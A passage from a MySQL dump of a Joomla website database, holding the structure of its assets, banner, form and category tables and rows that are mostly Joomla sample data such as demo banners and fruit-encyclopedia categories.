Encyclopedia','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(63,62,32,33,5,'com_contact.category.38','A','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(64,62,34,35,5,'com_contact.category.39','B','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(65,62,36,37,5,'com_contact.category.40','C','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(66,62,38,39,5,'com_contact.category.41','D','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(67,62,40,41,5,'com_contact.category.42','E','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(68,62,42,43,5,'com_contact.category.43','F','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(69,62,44,45,5,'com_contact.category.44','G','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(70,62,46,47,5,'com_contact.category.45','H','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(71,62,48,49,5,'com_contact.category.46','I','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(72,62,50,51,5,'com_contact.category.47','J','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(73,62,52,53,5,'com_contact.category.48','K','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(74,62,54,55,5,'com_contact.category.49','L','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(75,62,56,57,5,'com_contact.category.50','M','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(76,62,58,59,5,'com_contact.category.51','N','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(77,62,60,61,5,'com_contact.category.52','O','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(78,62,62,63,5,'com_contact.category.53','P','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(79,62,64,65,5,'com_contact.category.54','Q','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(80,62,66,67,5,'com_contact.category.55','R','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(81,62,68,69,5,'com_contact.category.56','S','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(82,62,70,71,5,'com_contact.category.57','T','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(83,62,72,73,5,'com_contact.category.58','U','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(84,62,74,75,5,'com_contact.category.59','V','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(85,62,76,77,5,'com_contact.category.60','W','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(86,62,78,79,5,'com_contact.category.61','X','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(87,62,80,81,5,'com_contact.category.62','Y','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(88,62,82,83,5,'com_contact.category.63','Z','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(100,44,114,115,3,'com_content.category.71','Milky Way','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(168,34,106,107,3,'com_content.article.67','What\'s New in 1.5?','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(169,24,219,220,2,'com_users.category.77','Uncategorised',''),(173,1,286,287,1,'com_joomlaupdate','com_joomlaupdate','{\"core.admin\":[],\"core.manage\":[],\"core.delete\":[],\"core.edit.state\":[]}'),(175,1,288,289,1,'com_tags','com_tags','{\"core.admin\":{\"8\":1},\"core.manage\":{\"7\":1},\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(176,1,290,291,1,'com_contenthistory','com_contenthistory','{}'),(177,1,292,293,1,'com_ajax','com_ajax','{}'),(178,1,294,295,1,'com_postinstall','com_postinstall','{}'),(179,8,119,128,2,'com_content.category.79','Blog','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(180,1,296,311,1,'com_sppagebuilder','sppagebuilder','{}'),(181,18,151,152,2,'com_modules.module.91','SP Page Builder',''),(182,18,153,154,2,'com_modules.module.92','SP Page Builder Admin Menu',''),(185,18,155,156,2,'com_modules.module.17','Breadcrumbs','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(186,18,157,158,2,'com_modules.module.35','Search','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(187,18,159,160,2,'com_modules.module.94','About Helix','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(188,18,161,162,2,'com_modules.module.95','Latest News','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(189,18,163,164,2,'com_modules.module.96','Our Partners','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(190,18,165,166,2,'com_modules.module.97','Quick Link','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(191,179,120,121,3,'com_content.category.80','News','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(192,179,122,123,3,'com_content.category.81','Tutorial','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(193,179,124,125,3,'com_content.category.82','Review','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(194,179,126,127,3,'com_content.category.83','Updates','{\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(203,18,167,168,2,'com_modules.module.99','Latest News','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(204,18,169,170,2,'com_modules.module.100','Search','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(205,18,171,172,2,'com_modules.module.101','Information','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(206,18,173,174,2,'com_modules.module.102','Search','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(207,18,175,176,2,'com_modules.module.103','Latest News','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(208,18,177,178,2,'com_modules.module.104','Information','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(209,18,179,180,2,'com_modules.module.105','Off Canvas Menu','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(212,18,181,182,2,'com_modules.module.108','ImageRecycle Statistics','{\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1}}'),(213,1,312,313,1,'com_akeeba','Akeeba','{}'),(214,1,314,315,1,'com_admintools','Admintools','{}'),(216,1,316,319,1,'com_imagerecycle','ImageRecycle','{}'),(217,216,317,318,2,'com_imagerecycle.category.84','COM_IMAGERECYCLE_INSTALLER_NEW_CATEGORY','{}'),(218,18,183,184,2,'com_modules.module.109','News Show Pro GK5','{}'),(219,1,320,323,1,'com_djimageslider','com_djimageslider','{}'),(220,18,185,186,2,'com_modules.module.110','DJ-ImageSlider','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),(221,219,321,322,2,'com_djimageslider.category.85','Headers','{}'),(222,1,324,325,1,'com_snippets','com_snippets','{\"core.admin\":[],\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(223,1,326,327,1,'com_breezingforms','BreezingForms','{}'),(224,18,187,188,2,'com_modules.module.111','BreezingForms','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),(225,18,189,190,2,'com_modules.module.112','Authorised Financial Service Provider. FSP No: 44636 ','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),(226,18,191,192,2,'com_modules.module.113','Contact Top','{\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"module.edit.frontend\":[]}'),(227,18,193,194,2,'com_modules.module.114','SP Page Builder','{}'),(228,1,328,329,1,'com_fields','com_fields','{}'),(229,1,330,331,1,'com_associations','com_associations','{}'),(230,180,297,298,2,'com_sppagebuilder.page.1','Home','{}'),(231,1,332,333,1,'#__sppagebuilder.7','#__sppagebuilder.7','{}'),(232,180,299,300,2,'com_sppagebuilder.page.8','Contact us','{}'),(233,18,195,196,2,'com_modules.module.115','Tsi Map','{}'),(234,180,301,302,2,'com_sppagebuilder.page.7','About us','{}'),(235,180,303,304,2,'com_sppagebuilder.page.9','Personal Solutions','{}'),(236,180,305,306,2,'com_sppagebuilder.page.10','Corporate Solutions','{}'),(237,1,334,335,1,'com_privacy','com_privacy','{}'),(238,1,336,337,1,'com_actionlogs','com_actionlogs','{}'),(239,18,197,198,2,'com_modules.module.116','JSitemap module','{}'),(240,18,199,200,2,'com_modules.module.117','JSitemap Quickicons','{}'),(241,1,338,339,1,'com_jmap','JMap','{}'),(242,180,307,308,2,'com_sppagebuilder.page.12','Thank-you','{}'),(243,16,145,146,2,'com_menus.menu.5','links','{}'),(244,1,340,341,1,'com_content.article.68','Site Cookie Policy','{}'),(246,180,309,310,2,'com_sppagebuilder.page.13','Cookie Policy','{}');
/*!40000 ALTER TABLE `vzx9b_assets` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_associations`
--
DROP TABLE IF EXISTS `vzx9b_associations`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_associations` (
`id` int(11) NOT NULL COMMENT 'A reference to the associated item.',
`context` varchar(50) NOT NULL COMMENT 'The context of the associated item.',
`key` char(32) NOT NULL COMMENT 'The key for the association computed from an md5 on associated ids.',
PRIMARY KEY (`context`,`id`),
KEY `idx_key` (`key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_associations`
--
LOCK TABLES `vzx9b_associations` WRITE;
/*!40000 ALTER TABLE `vzx9b_associations` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_associations` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_banner_clients`
--
DROP TABLE IF EXISTS `vzx9b_banner_clients`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_banner_clients` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`name` varchar(255) NOT NULL DEFAULT '',
`contact` varchar(255) NOT NULL DEFAULT '',
`email` varchar(255) NOT NULL DEFAULT '',
`extrainfo` mediumtext NOT NULL,
`state` tinyint(3) NOT NULL DEFAULT 0,
`checked_out` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`metakey` mediumtext NOT NULL,
`own_prefix` tinyint(4) NOT NULL DEFAULT 0,
`metakey_prefix` varchar(255) NOT NULL DEFAULT '',
`purchase_type` tinyint(4) NOT NULL DEFAULT -1,
`track_clicks` tinyint(4) NOT NULL DEFAULT -1,
`track_impressions` tinyint(4) NOT NULL DEFAULT -1,
PRIMARY KEY (`id`),
KEY `idx_own_prefix` (`own_prefix`),
KEY `idx_metakey_prefix` (`metakey_prefix`(100))
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_banner_clients`
--
LOCK TABLES `vzx9b_banner_clients` WRITE;
/*!40000 ALTER TABLE `vzx9b_banner_clients` DISABLE KEYS */;
INSERT INTO `vzx9b_banner_clients` VALUES (1,'Joomla!','Administrator','email@email.com','',1,0,'0000-00-00 00:00:00','',0,'',-1,-1,-1),(2,'Shop','Example','example@example.com','',1,0,'0000-00-00 00:00:00','',0,'',-1,0,0),(3,'Bookstore','Bookstore Example','example@example.com','',1,0,'0000-00-00 00:00:00','',0,'',-1,0,0);
/*!40000 ALTER TABLE `vzx9b_banner_clients` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_banner_tracks`
--
DROP TABLE IF EXISTS `vzx9b_banner_tracks`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_banner_tracks` (
`track_date` datetime NOT NULL,
`track_type` int(10) unsigned NOT NULL,
`banner_id` int(10) unsigned NOT NULL,
`count` int(10) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`track_date`,`track_type`,`banner_id`),
KEY `idx_track_date` (`track_date`),
KEY `idx_track_type` (`track_type`),
KEY `idx_banner_id` (`banner_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_banner_tracks`
--
LOCK TABLES `vzx9b_banner_tracks` WRITE;
/*!40000 ALTER TABLE `vzx9b_banner_tracks` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_banner_tracks` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_banners`
--
DROP TABLE IF EXISTS `vzx9b_banners`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_banners` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`cid` int(11) NOT NULL DEFAULT 0,
`type` int(11) NOT NULL DEFAULT 0,
`name` varchar(255) NOT NULL DEFAULT '',
`alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
`imptotal` int(11) NOT NULL DEFAULT 0,
`impmade` int(11) NOT NULL DEFAULT 0,
`clicks` int(11) NOT NULL DEFAULT 0,
`clickurl` varchar(200) NOT NULL DEFAULT '',
`state` tinyint(3) NOT NULL DEFAULT 0,
`catid` int(10) unsigned NOT NULL DEFAULT 0,
`description` mediumtext NOT NULL,
`custombannercode` varchar(2048) NOT NULL,
`sticky` tinyint(1) unsigned NOT NULL DEFAULT 0,
`ordering` int(11) NOT NULL DEFAULT 0,
`metakey` mediumtext NOT NULL,
`params` mediumtext NOT NULL,
`own_prefix` tinyint(1) NOT NULL DEFAULT 0,
`metakey_prefix` varchar(400) NOT NULL DEFAULT '',
`purchase_type` tinyint(4) NOT NULL DEFAULT -1,
`track_clicks` tinyint(4) NOT NULL DEFAULT -1,
`track_impressions` tinyint(4) NOT NULL DEFAULT -1,
`checked_out` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`reset` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`language` char(7) NOT NULL DEFAULT '',
`created_by` int(10) unsigned NOT NULL DEFAULT 0,
`created_by_alias` varchar(255) NOT NULL DEFAULT '',
`modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_by` int(10) unsigned NOT NULL DEFAULT 0,
`version` int(10) unsigned NOT NULL DEFAULT 1,
PRIMARY KEY (`id`),
KEY `idx_state` (`state`),
KEY `idx_own_prefix` (`own_prefix`),
KEY `idx_banner_catid` (`catid`),
KEY `idx_language` (`language`),
KEY `idx_metakey_prefix` (`metakey_prefix`(100))
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_banners`
--
LOCK TABLES `vzx9b_banners` WRITE;
/*!40000 ALTER TABLE `vzx9b_banners` DISABLE KEYS */;
INSERT INTO `vzx9b_banners` VALUES (2,3,0,'Shop 1','shop-1',0,0,0,'http://shop.joomla.org/amazoncom-bookstores.html',1,15,'Get books about Joomla! at the Joomla! Book Shop.','',0,1,'','{\"imageurl\":\"images\\/banners\\/white.png\",\"width\":\"\",\"height\":\"\",\"alt\":\"Joomla! Books\"}',0,'',-1,0,0,0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','2011-01-01 00:00:01','en-GB',42,'Joomla','0000-00-00 00:00:00',0,1),(3,2,0,'Shop 2','shop-2',0,0,0,'http://shop.joomla.org',1,15,'T Shirts, caps and more from the Joomla! Shop.','',0,2,'','{\"imageurl\":\"images\\/banners\\/white.png\",\"width\":\"\",\"height\":\"\",\"alt\":\"Joomla! Shop\"}',0,'',-1,0,0,0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','2011-01-01 00:00:01','en-GB',42,'Joomla','0000-00-00 00:00:00',0,1),(4,1,0,'Support Joomla!','support-joomla',0,0,0,'http://contribute.joomla.org',1,15,'Your contributions of time, talent and money make Joomla possible.','',0,3,'','{\"imageurl\":\"images\\/banners\\/white.png\",\"width\":\"\",\"height\":\"\",\"alt\":\"\"}',0,'',-1,0,0,0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00','2011-01-01 00:00:01','en-GB',42,'Joomla','0000-00-00 00:00:00',0,1);
/*!40000 ALTER TABLE `vzx9b_banners` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_breezingforms`
--
DROP TABLE IF EXISTS `vzx9b_breezingforms`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_breezingforms` (
`id` int(11) NOT NULL,
`language` varchar(255) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_breezingforms`
--
LOCK TABLES `vzx9b_breezingforms` WRITE;
/*!40000 ALTER TABLE `vzx9b_breezingforms` DISABLE KEYS */;
/*!40000 ALTER TABLE `vzx9b_breezingforms` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_categories`
--
DROP TABLE IF EXISTS `vzx9b_categories`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_categories` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`asset_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'FK to the #__assets table.',
`parent_id` int(10) unsigned NOT NULL DEFAULT 0,
`lft` int(11) NOT NULL DEFAULT 0,
`rgt` int(11) NOT NULL DEFAULT 0,
`level` int(10) unsigned NOT NULL DEFAULT 0,
`path` varchar(400) NOT NULL DEFAULT '',
`extension` varchar(50) NOT NULL DEFAULT '',
`title` varchar(255) NOT NULL DEFAULT '',
`alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
`note` varchar(255) NOT NULL DEFAULT '',
`description` mediumtext DEFAULT NULL,
`published` tinyint(1) NOT NULL DEFAULT 0,
`checked_out` int(11) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`access` int(10) unsigned NOT NULL DEFAULT 0,
`params` text DEFAULT NULL,
`metadesc` varchar(1024) NOT NULL DEFAULT '' COMMENT 'The meta description for the page.',
`metakey` varchar(1024) NOT NULL DEFAULT '' COMMENT 'The meta keywords for the page.',
`metadata` varchar(2048) NOT NULL DEFAULT '' COMMENT 'JSON encoded metadata properties.',
`created_user_id` int(10) unsigned NOT NULL DEFAULT 0,
`created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_user_id` int(10) unsigned NOT NULL DEFAULT 0,
`modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`hits` int(10) unsigned NOT NULL DEFAULT 0,
`language` char(7) NOT NULL DEFAULT '',
`version` int(10) unsigned NOT NULL DEFAULT 1,
PRIMARY KEY (`id`),
KEY `cat_idx` (`extension`,`published`,`access`),
KEY `idx_access` (`access`),
KEY `idx_checkout` (`checked_out`),
KEY `idx_left_right` (`lft`,`rgt`),
KEY `idx_language` (`language`),
KEY `idx_path` (`path`(100)),
KEY `idx_alias` (`alias`(100))
) ENGINE=InnoDB AUTO_INCREMENT=86 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_categories`
--
LOCK TABLES `vzx9b_categories` WRITE;
/*!40000 ALTER TABLE `vzx9b_categories` DISABLE KEYS */;
INSERT INTO `vzx9b_categories` VALUES (1,0,0,0,95,0,'','system','ROOT','root','','',1,0,'0000-00-00 00:00:00',1,'{}','','','',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(9,34,1,5,6,1,'uncategorised','com_content','Uncategorised','uncategorised','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(10,35,1,77,78,1,'uncategorised','com_banners','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\",\"foobar\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(11,36,1,73,74,1,'uncategorised','com_contact','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(12,37,1,9,10,1,'uncategorised','com_newsfeeds','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(15,40,1,75,76,1,'sample-data-banners','com_banners','Sample Data-Banners','sample-data-banners','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\",\"foobar\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(16,41,1,11,72,1,'sample-data-contact','com_contact','Sample Data-Contact','sample-data-contact','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(17,42,1,7,8,1,'sample-data-newsfeeds','com_newsfeeds','Sample Data-Newsfeeds','sample-data-newsfeeds','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(19,44,1,1,4,1,'joomla','com_content','Joomla!','joomla','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',864,'2015-02-02 06:05:15',0,'*',1),(21,46,19,2,3,2,'joomla/components','com_content','Components','components','','<p>Components are larger extensions that produce the major content for your site. Each component has one or more \"views\" that control how content is displayed. In the Joomla administrator there are additional extensions such as Menus, Redirection, and the extension managers.</p>',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',864,'2015-02-02 06:05:23',0,'*',1),(34,59,16,12,13,2,'sample-data-contact/park-site','com_contact','Park Site','park-site','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'en-GB',1),(35,60,16,14,71,2,'sample-data-contact/shop-site','com_contact','Shop Site','shop-site','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(36,61,35,15,16,3,'sample-data-contact/shop-site/staff','com_contact','Staff','staff','','<p>Please feel free to contact our staff at any time should you need assistance.</p>',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(37,62,35,17,70,3,'sample-data-contact/shop-site/fruit-encyclopedia','com_contact','Fruit Encyclopedia','fruit-encyclopedia','','<p> </p><p>Our directory of information about different kinds of fruit.</p><p>We love fruit and want the world to know more about all of its many varieties.</p><p>Although it is small now, we work on it whenever we have a chance.</p><p>All of the images can be found in <a href=\"http://commons.wikimedia.org/wiki/Main_Page\">Wikimedia Commons</a>.</p><p><img src=\"images/sampledata/fruitshop/apple.jpg\" border=\"0\" alt=\"Apples\" title=\"Apples\" /></p><p><em>This encyclopedia is implemented using the contact component, each fruit a separate contact and a category for each letter. A CSS style is used to create the horizontal layout of the alphabet headings. </em></p><p><em>If you wanted to, you could allow some users (such as your growers) to have access to just this category in the contact component and let them help you to create new content for the encyclopedia.</em></p><p> </p>',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(38,63,37,18,19,4,'sample-data-contact/shop-site/fruit-encyclopedia/a','com_contact','A','a','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(39,64,37,20,21,4,'sample-data-contact/shop-site/fruit-encyclopedia/b','com_contact','B','b','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(40,65,37,22,23,4,'sample-data-contact/shop-site/fruit-encyclopedia/c','com_contact','C','c','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(41,66,37,24,25,4,'sample-data-contact/shop-site/fruit-encyclopedia/d','com_contact','D','d','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(42,67,37,26,27,4,'sample-data-contact/shop-site/fruit-encyclopedia/e','com_contact','E','e','','',-2,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',309,'2011-01-01 00:00:01',0,'0000-00-00 